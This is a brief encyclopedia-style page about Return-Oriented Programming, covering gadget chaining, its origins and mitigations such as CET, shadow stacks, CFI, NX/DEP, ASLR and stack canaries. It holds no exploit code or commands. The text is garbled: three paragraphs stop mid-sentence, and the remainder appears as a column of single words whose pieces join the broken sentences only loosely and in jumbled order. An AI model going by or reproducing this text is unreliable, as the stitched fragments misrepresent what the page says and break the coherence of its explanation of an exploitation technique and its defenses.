Home

ROP

Return-Oriented Programming (ROP) is a code-reuse exploitation technique that enables an attacker to execute arbitrary code in the context of a vulnerable process by chaining together short instruction sequences, or gadgets, that already exist in the program’s address space. Each gadget ends with a return instruction. By carefully arranging the stack, the attacker diverts control flow to a gadget, then to another, etc., forming a ROP chain that performs operations, such as setting registers or calling system routines, without injecting attacker code.

Origins and concept: ROP was described in detail by Hovav Shacham in 2007 as a response to

Usage and goals: ROP is used in security testing and exploitation to bypass memory protection mechanisms. It

Defenses: Mitigations include hardware-assisted defenses like Intel CET and shadow stacks, Control-Flow Integrity (CFI), and traditional

non-executable
stack
protections
(NX/DEP).
The
technique
relies
on
existing
code
in
libraries
or
the
program
itself,
typically
starting
from
known
code
sequences
ending
in
ret.
Gadget
sources
include
libc,
the
program’s
code,
or
loaded
libraries.
can
implement
system
calls,
file
operations,
or
network
actions,
depending
on
the
platform
and
calling
conventions.
Complexity
grows
with
chain
length
and
gadget
availability;
attackers
may
combine
gadgets
to
set
registers,
perform
memory
reads/writes,
and
invoke
libc
functions.
measures
such
as
ASLR,
PIE,
RELRO,
and
stack
canaries.
Defensive
approaches
also
include
compiler-based
randomization
of
gadgets
and
removing
executable
memory
regions.
Patch
management
is
essential
to
close
vulnerable
code
paths
enabling
gadget
discovery.